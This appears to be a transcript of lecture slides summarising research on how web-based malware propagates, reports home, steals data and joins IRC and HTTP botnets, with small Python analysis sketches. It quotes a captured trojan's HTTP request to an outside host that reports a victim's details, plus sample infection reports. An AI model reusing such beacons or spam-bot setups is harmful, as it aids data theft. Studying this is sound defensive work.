Introduction

CS 510 Malware. Ghost Turns Zombie: Exploring the Life Cycle of Web-Based Malware. Michalis Polychronakis, Panayiotis Mavrommatis, Niels Provos


Transcript of Introduction

Page 1: Introduction

CS 510 MALWARE

GHOST TURNS ZOMBIE: EXPLORING THE LIFE CYCLE OF WEB-BASED MALWARE

MICHALIS POLYCHRONAKIS
PANAYIOTIS MAVROMMATIS
NIELS PROVOS

Page 2: Introduction

Introduction
• The underground Internet economy
• Web-based malware
• The system analyzing the post-infection network behavior of web-based malware
• How do malware's behaviors, taken together, provide a compelling perspective on the life cycle of web-based malware?

Page 3: Introduction

System Architecture
o The goal of the system
• Detect harmful URLs on the web
o A brief overview of the overall system the authors used in their prior work
• Machine learning techniques find suspicious URLs among a large number of web pages; those URLs are then verified in a virtual machine
o The new extended system
• Responders

Page 4: Introduction

System Architecture

Overall system architecture
o Virtual machine used
o Observed features:
• Links to known malware distribution sites
• Suspicious HTML elements
• The presence of code obfuscation
o Machine learning system
• Scores each URL; a URL with a high score is sent for verification
o Verification results are used to retrain the machine learning system
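The scoring step can be pictured with a toy example. The slides do not say which model or weights the authors used, so the sketch below swaps in a hand-weighted integer score; the class `PageFeatures`, the weights, and the threshold are all hypothetical and only illustrate how the three observed features could feed a verification decision.

```python
from dataclasses import dataclass


@dataclass
class PageFeatures:
    """The three observed features listed on the slide (names are hypothetical)."""
    links_to_known_malware_site: bool
    has_suspicious_html_element: bool
    has_obfuscated_code: bool


# Hypothetical integer weights and threshold, chosen only for illustration.
# They are NOT taken from the authors' system.
WEIGHT_MALWARE_LINK = 3
WEIGHT_SUSPICIOUS_HTML = 1
WEIGHT_OBFUSCATION = 1
VERIFY_THRESHOLD = 2


def score(features: PageFeatures) -> int:
    """Sum the weights of the features that are present."""
    total = 0
    if features.links_to_known_malware_site:
        total += WEIGHT_MALWARE_LINK
    if features.has_suspicious_html_element:
        total += WEIGHT_SUSPICIOUS_HTML
    if features.has_obfuscated_code:
        total += WEIGHT_OBFUSCATION
    return total


def needs_verification(features: PageFeatures) -> bool:
    """A URL with a high score is sent to the virtual machine for verification."""
    return score(features) >= VERIFY_THRESHOLD
```

In the real system the weights would come from training, and the verification results would be fed back to retrain the model.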

Page 5: Introduction

System Architecture
Responders
o They extended the system, improving the verification component with lightweight responders
o The responders provide fabricated responses for protocols such as SMTP, FTP and IRC
o The HTTP proxy records all HTTP requests and scans all HTTP responses
o The generic responder hands off connections over nonstandard ports and identifies connections that use unknown protocols
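One way to picture the generic responder's job is a function that looks at the first bytes a client sends and guesses the protocol, so the connection can be handed to the matching responder. This is a minimal sketch under stated assumptions: the function name `identify_protocol` and the keyword lists are hypothetical, and the slides do not describe how the authors' responder actually identifies protocols.

```python
def identify_protocol(first_bytes: bytes) -> str:
    """Guess the protocol from the first line a client sends.

    Hypothetical heuristic for illustration only: it checks a few
    well-known client commands and reports "unknown" otherwise.
    """
    first_line = first_bytes.split(b"\r\n", 1)[0].upper()
    if first_line.startswith((b"GET ", b"POST ", b"HEAD ")):
        return "http"
    if first_line.startswith((b"HELO ", b"EHLO ")):
        return "smtp"
    if first_line.startswith((b"NICK ", b"JOIN ")):
        return "irc"
    return "unknown"
```

A connection classified as "unknown" would be the case the slide describes as a connection that uses an unknown protocol. Protocols in which the server speaks first, such as SMTP and FTP, would also need the responder to send a banner before any client bytes arrive.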

Page 6: Introduction

Responders

[Figure: network flow in the verification component]

Page 7: Introduction

Life cycle of web-based malware
o Malware's interactions with other hosts and responders are organized into 3 categories:
1. Propagation
2. Data exfiltration
3. Remote control
o They analyzed the post-infection activity and the results of these behaviors to trace the life cycle of web-based malware

Page 8: Introduction

Life cycle of web-based malware
Data Set
o Over 2 months, the virtual machines analyzed URLs from 5,756,000 unique hostnames; results are reported per unique hostname
o 307,000 hostnames had at least one harmful URL
o 49% of these websites had URLs that resulted in HTTP requests initiated from a process other than the web browser
o 5% of the sites had URLs that activated a responder session
o The total number of responder sessions with transmitted data is more than 448,000
o In many more cases, malware made network connections without transmitting any data
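The figures above can be turned into rough absolute numbers with a few lines of arithmetic. The sketch assumes that both percentages refer to the 307,000 hostnames with at least one harmful URL, and because the slide's percentages are rounded, the derived counts are only approximate.

```python
total_hostnames = 5_756_000   # unique hostnames analyzed
harmful_hostnames = 307_000   # hostnames with at least one harmful URL

# Share of analyzed hostnames that served at least one harmful URL.
harmful_share = harmful_hostnames / total_hostnames

# Approximate counts derived from the rounded percentages on the slide.
non_browser_http_sites = round(0.49 * harmful_hostnames)
responder_session_sites = round(0.05 * harmful_hostnames)

print(f"harmful share of hostnames: {harmful_share:.2%}")
print(f"sites with non-browser HTTP requests: about {non_browser_http_sites:,}")
print(f"sites that activated a responder: about {responder_session_sites:,}")
```

So roughly one analyzed hostname in nineteen hosted a harmful URL.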

Page 9: Introduction

Life cycle of web-based malware
Network characteristics

[Figure: the destination ports of all outgoing connections from the virtual machine upon infection]

Page 10: Introduction

Life cycle of web-based malware
Network characteristics
o They counted the number of unique hostnames for each port
o A hostname is counted for a port if at least one of its URLs installs malware that transmitted data to that port
o Connections were made to more than 400 different destination ports
o This shows the diverse nature of malware's post-infection network behavior

Page 11: Introduction

[Figure: the exact distribution of HTTP connections destined to nonstandard ports, by destination port number]

Page 12: Introduction

Life cycle of web-based malware
Discovery and Propagation
o To propagate, malware usually scans for other vulnerable systems, either on the same LAN or on the Internet

[Figure: the distribution of network protocols used by malware]

Page 13: Introduction

Life cycle of web-based malware
Reporting Home
o To observe this activity, SMTP responders are employed to capture emails
o Each captured email has a subject and a body

Page 14: Introduction

Life cycle of web-based malware
Reporting Home

Table 1 shows the most common email subjects

TABLE 1
Subject                                # Messages
XP Hacked                              390
ProRat [...]                           162
Vip Passw0rds                          98
Log file from ...                      82
Installation report                    76
Perfect Keylogger [...]                47
Installation on XP succeeded           12
E g y S p y KeyLogger [...]            12
INFECTADO                              6
Mais 1: XP                             3
AVSXP                                  3
C-h-e-c-k-i-n-g:XP                     2
...:Noticia quentinha de:... XP        2

Table 2 shows the common SMTP servers used by malware to send installation reports

TABLE 2
SMTP Server        # Messages
yahoo.com          436
google.com         118
tvm.com.tr         98
aol.com            82
hotmail.com        19
outblaze.com       8
globo.com          6

Page 15: Introduction

Life cycle of web-based malware
Reporting Home

The HTTP protocol is also used to report successful installations back to malware authors

The trojan example:

GET /geturl.php?version=1.1.2&fid=7493&mac=00-00-00-00-00-00&lversion=&wversion=&day=0&name=dodolook&recent=0 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; )
Host: loader.51edm.net:1207
Cache-Control: no-cache
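The query string in the trojan's request can be decoded with a standard URL parser to see which fields the installation report carries. The sketch below uses Python's `urllib.parse`; the variable names are illustrative, and the meaning of individual fields (for example `fid`) is not stated on the slide.

```python
from urllib.parse import parse_qsl, urlsplit

# Request target copied from the trojan's GET request on the slide.
request_target = (
    "/geturl.php?version=1.1.2&fid=7493&mac=00-00-00-00-00-00"
    "&lversion=&wversion=&day=0&name=dodolook&recent=0"
)

parts = urlsplit(request_target)

# keep_blank_values=True preserves empty fields such as lversion and wversion.
report = dict(parse_qsl(parts.query, keep_blank_values=True))

for key, value in report.items():
    print(f"{key} = {value!r}")
```

The decoded report includes a version string, a MAC address field, and the name `dodolook`, which is the kind of per-installation data the slide refers to.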

Page 16: Introduction

Life cycle of web-based malware
Reporting Home
o Malware also reported infections using a custom XML-like format

HGZ5.<FT>2008-01-28 12:55:30</FT><IM>80</IM><GR>_&</GR><SYS>Windows XP 5.1</SYS> <NE>XP</NE><pid>488</PID><VER>Ver1.22-0624</VER> <BZ></BZ><P>1</P><V>0</V><IP>0.0.0.0</IP>

000......<LC></LC><GR>-</GR><IM>25</IM><NA>XP</NA> <CS>English (United States)</CS><OS>Windows XP</OS> <MEM>1024MB</MEM><CPU>2200 MHz</CPU> <NET>LAN</NET><video>0</video><BZ>-</BZ>
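Because the format only resembles XML (there is a leading marker, no root element, and tag case is inconsistent, as in `<pid>…</PID>`), a strict XML parser would likely reject it. A minimal sketch of a more tolerant approach uses a regular expression to extract tag and value pairs; the function name `parse_report` is hypothetical, and the slides do not describe how the authors decoded these messages.

```python
import re

# Matches <TAG>value</TAG>; the closing tag is compared case-insensitively below.
_FIELD = re.compile(r"<(\w+)>(.*?)</(\w+)>")


def parse_report(raw: str) -> dict:
    """Extract tag/value pairs from an XML-like infection report."""
    fields = {}
    for match in _FIELD.finditer(raw):
        open_tag, value, close_tag = match.groups()
        if open_tag.lower() == close_tag.lower():
            fields[open_tag.upper()] = value
    return fields


# First sample from the slide, copied as-is.
sample = (
    "HGZ5.<FT>2008-01-28 12:55:30</FT><IM>80</IM><GR>_&</GR>"
    "<SYS>Windows XP 5.1</SYS> <NE>XP</NE><pid>488</PID>"
    "<VER>Ver1.22-0624</VER> <BZ></BZ><P>1</P><V>0</V><IP>0.0.0.0</IP>"
)
report = parse_report(sample)
```

Keys are normalized to upper case so that `<pid>` and `</PID>` end up as one `PID` field.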

Page 17: Introduction

Life cycle of web-based malware
Data exfiltration
o Responder sessions show indications of data exfiltration, such as browser history files and stored passwords
o They found emails that send stored passwords back from a compromised machine
o HTTP is also used for sending sensitive information back to data collection servers (notice the large number of POST requests on the graph on slide #11)

Page 18: Introduction

Life cycle of web-based malware
Data exfiltration
o In 2 days, one server held 4,729 files containing more than 250,000 valid email addresses
o They found more sensitive information in extensive logs continuously uploaded by malware
o The logs contain the victim's IP address, DNS server, gateway, MAC address, username, URL, and the intercepted form and password fields of HTTP requests
o In 250 MB of logs, 500 usernames and passwords were found for over 250 web sites, such as banking sites, google.com, yahoo.com, etc.

Page 19: Introduction

Life cycle of web-based malware
Joining Botnets
o They encountered 2 types of botnets in their work:
1. IRC botnets
2. HTTP botnets

Page 20: Introduction

Life cycle of web-based malware
IRC Botnets
o IRC and C&C communication
o IRC sessions to 90 servers were observed, using 1,587 different nicknames in 95 channels

Page 21: Introduction

Life cycle of web-based malware
IRC Botnets
o Some malware uses regular nicknames and channels, but some uses artificial nicknames such as [0]USA|XP[P]152102 or Inject-2l087876
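Both example nicknames end in a long run of digits, which suggests a simple way to flag machine-generated names. The sketch below is a hypothetical heuristic (any run of five or more digits), not a method from the slides, and it would miss bots that use ordinary-looking nicknames.

```python
import re

# Hypothetical rule: a run of 5 or more digits marks a generated nickname.
_DIGIT_RUN = re.compile(r"\d{5,}")


def looks_generated(nickname: str) -> bool:
    """Return True if the nickname contains a long run of digits."""
    return bool(_DIGIT_RUN.search(nickname))
```

Applied to the two nicknames above, the check flags both, while a short human-style nickname passes.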

Page 22: Introduction

Life cycle of web-based malware
HTTP Botnets
o HTTP botnets organize large-scale spam campaigns
o To participate in a campaign, each bot repeatedly requested instructions over HTTP
o Each response carried a ZIP archive with instructions on how to participate in the spam campaign

Page 23: Introduction

Life cycle of web-based malware
HTTP Botnets
Some example instructions:
• 000_data22 - a list of domains and their authoritative name servers used to form the sender's email address
• 001_ncommall - a list of common first names used as part of the sender's email address
• 002_otkogo_r - a list of possible "from" names related to the subject of the spam campaign
• 003_subj_rep - a list of possible email subjects
• 004_outlook - the template of the spam email
• config - a configuration file that instructs the bot how to construct emails from the data files, how many emails to send in total, and how many connections are allowed at a given time
• message - the message body of the spam campaign
• mlist - a list of email addresses to which to send the spam
• mxdata - a binary file containing information about the mail-exchange servers for the email addresses in mlist

Page 24: Introduction

Life cycle of web-based malware
HTTP Botnets

Top domains out of 700,000 email addresses collected from a spam-sending botnet.

Email Domain             Frequency
yahoo.com                28899
sbcglobal.net            14417
yahoo.co.uk              8939
shaw.ca                  8321
hotmail.com              6985
korea.com                6041
yahoo.co.jp              5215
striker.ottawa.on.ca     4415
web.de                   4276
yahoo.co.in              4200

o The most frequent domains captured in an hour didn't entirely overlap with the larger data set
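A domain frequency ranking like this one can be produced by counting the part after the "@" in each collected address. The sketch below is illustrative only: the function name `top_domains` is hypothetical, the sample addresses are made up, and the slides do not say how the authors computed their ranking.

```python
from collections import Counter


def top_domains(addresses, n=10):
    """Return the n most frequent email domains as (domain, count) pairs."""
    domains = (
        address.rsplit("@", 1)[1].lower()
        for address in addresses
        if "@" in address
    )
    return Counter(domains).most_common(n)


# Made-up sample list, standing in for the bot's mlist file.
sample = ["a@yahoo.com", "b@Yahoo.com", "c@web.de", "not-an-address"]
ranking = top_domains(sample, n=2)
```

Running the same count on an hour's capture and on the full data set would make it possible to compare the two rankings.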

Page 25: Introduction

Summary and Conclusion